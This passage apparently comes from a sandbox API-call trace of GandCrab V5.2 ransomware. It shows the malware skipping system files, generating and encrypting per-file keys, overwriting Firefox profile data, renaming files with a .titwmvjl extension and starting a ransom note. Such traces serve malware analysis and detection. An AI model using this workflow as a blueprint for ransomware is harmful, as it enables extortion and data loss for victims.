lpString2="boot.ini") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntuser.dat.log") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="thumbs.db") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="CRAB-DECRYPT.html") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntldr") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="NTDETECT.COM") returned -1 [0084.523] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="Bootfont.bin") returned -1 [0084.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0084.523] lstrlenW (lpString=".sqlite") returned 7 [0084.523] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.524] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0084.524] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.524] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.524] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e8 [0084.525] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.525] ReadFile (in: hFile=0x2e8, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dd3c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259dd3c*=0x21c, lpOverlapped=0x0) returned 1 [0084.525] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.526] CryptAcquireContextW (in: phProv=0x259dc6c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc6c*=0x4c9980) returned 1 [0084.527] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.527] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.527] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.527] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259dcf8 | out: pbBuffer=0x259dcf8) returned 1 [0084.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.527] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.527] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.528] CryptAcquireContextW (in: phProv=0x259dc6c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc6c*=0x4c9980) returned 1 [0084.529] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.529] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.529] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.529] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dd18 | out: pbBuffer=0x259dd18) returned 1 [0084.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.529] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.529] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.530] CryptAcquireContextW (in: phProv=0x259dc60, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc60*=0x4c9980) returned 1 [0084.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.531] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259dc64 | out: phKey=0x259dc64*=0x503938) returned 1 [0084.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.531] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259dc58, pdwDataLen=0x259dc5c, dwFlags=0x0 | out: pbData=0x259dc58*=0x800, pdwDataLen=0x259dc5c*=0x4) returned 1 [0084.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.531] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259dc90*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259dc90*=0x100) returned 1 [0084.531] GetLastError () returned 0x0 [0084.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.532] CryptDestroyKey (hKey=0x503938) returned 1 [0084.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.532] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.532] CryptAcquireContextW (in: phProv=0x259dc60, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc60*=0x4c9980) returned 1 [0084.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.533] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259dc64 | out: phKey=0x259dc64*=0x503938) returned 1 [0084.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.534] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259dc58, pdwDataLen=0x259dc5c, dwFlags=0x0 | out: pbData=0x259dc58*=0x800, pdwDataLen=0x259dc5c*=0x4) returned 1 [0084.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.534] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259dc90*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259dc90*=0x100) returned 1 [0084.534] GetLastError () returned 0x0 [0084.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.534] CryptDestroyKey (hKey=0x503938) returned 1 [0084.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.534] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.534] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.535] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0084.535] ReadFile (in: hFile=0x2e8, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dd3c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dd3c*=0xc000, lpOverlapped=0x0) returned 1 [0084.700] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xffff4000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.700] WriteFile (in: hFile=0x2e8, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc000, lpNumberOfBytesWritten=0x259dd20, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dd20*=0xc000, lpOverlapped=0x0) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.712] WriteFile (in: hFile=0x2e8, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dd20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259dd20*=0x21c, lpOverlapped=0x0) returned 1 [0084.714] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.718] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.718] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.718] CloseHandle (hObject=0x2e8) returned 1 [0084.719] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0084.720] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.720] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.720] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.720] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.721] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock" [0084.721] lstrlenW (lpString=".titwmvjl") returned 9 [0084.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock") returned 133 [0084.721] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.721] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 142 [0084.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock") returned 133 [0084.721] lstrlenW (lpString=".lock") returned 5 [0084.721] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.721] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.721] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.721] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.722] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.722] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.722] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.722] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt" [0084.722] lstrlenW (lpString=".titwmvjl") returned 9 [0084.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt") returned 129 [0084.722] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.722] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 138 [0084.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt") returned 129 [0084.722] lstrlenW (lpString=".txt") returned 4 [0084.722] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.722] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.722] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.722] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt") returned 129 [0084.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\TITWMVJL-DECRYPT.txt") returned 129 [0084.722] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.722] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.723] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.723] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.723] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 0 [0084.723] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0084.724] CloseHandle (hObject=0x2e0) returned 1 [0084.724] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.724] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.724] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.724] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt" [0084.724] lstrlenW (lpString=".titwmvjl") returned 9 [0084.724] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt") returned 125 [0084.724] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.724] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 134 [0084.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt") returned 125 [0084.725] lstrlenW (lpString=".txt") returned 4 [0084.725] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.725] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.725] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.725] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt") returned 125 [0084.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\TITWMVJL-DECRYPT.txt") returned 125 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.725] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.725] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.725] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0084.725] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0084.726] CloseHandle (hObject=0x2dc) returned 1 [0084.726] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0084.726] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.726] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.726] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock" [0084.726] lstrlenW (lpString=".titwmvjl") returned 9 [0084.726] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock") returned 122 [0084.726] VirtualAlloc (lpAddress=0x0, dwSize=0x134, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.727] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 131 [0084.727] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock") returned 122 [0084.727] lstrlenW (lpString=".lock") returned 5 [0084.727] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.727] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.727] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.727] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.727] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0084.727] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0084.727] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0084.727] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0084.728] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\" [0084.728] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.728] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.728] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.728] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.729] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.729] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.729] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.729] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\\\TITWMVJL-DECRYPT.txt") returned 139 [0084.729] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0084.731] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x4